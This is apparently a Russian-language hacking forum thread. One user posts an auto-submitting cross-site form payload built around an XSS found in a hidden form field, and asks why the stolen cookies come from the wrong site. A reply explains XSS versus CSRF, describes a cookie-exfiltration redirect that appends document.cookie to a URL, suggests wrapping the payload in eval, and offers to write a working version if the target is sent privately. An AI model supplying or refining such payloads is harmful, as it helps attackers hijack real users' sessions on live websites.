Привет, нашел в параметре формы XSS <input name="utf8" value="XSS" type="hidden"> скопировал форму и сделал автоотправку HTML: <form accept-charset="UTF-8" action="https://site.com" id="new_admin_user" method="post" novalidate="novalidate"> <input name="utf8" value="XSS" type="hidden"> <input name="authenticity_token" value="adoWvN//vb6CtJYHCGCQVM76mqV7DQy166T4qnUxZCM=" type="hidden"> </form><script>document.getElementsByTagName('form')[0].submit();</script> Разместил на своем сайте в iframe , отправка происходит но куки не сайта с багом, а моего сайта где лежит файл с формой. Что я не так сделал ?
Привет. Ты xss с CSRF не путай. Смотри что происходит. iframe не смотря на то, что делает запрос к серверу, возвращает в итоге все равно верстку. Это так работает. Когда ты разместил у себя и какой нить чувак прошёл от него летит запрос к серверу, но клиентская сторона выполняется у тебя поэтому и берет твои куки. то есть когда в хсску пишешь document.location.href= 'Уязвимый сайт' + document.cookie - у тебя куки уже подставляются. Как вариант заверни в eval и передавай строку. А вообще покажи что ты пишешь в XSS? А ещё в идеале таргет в лс и напишу рабочий вариант.
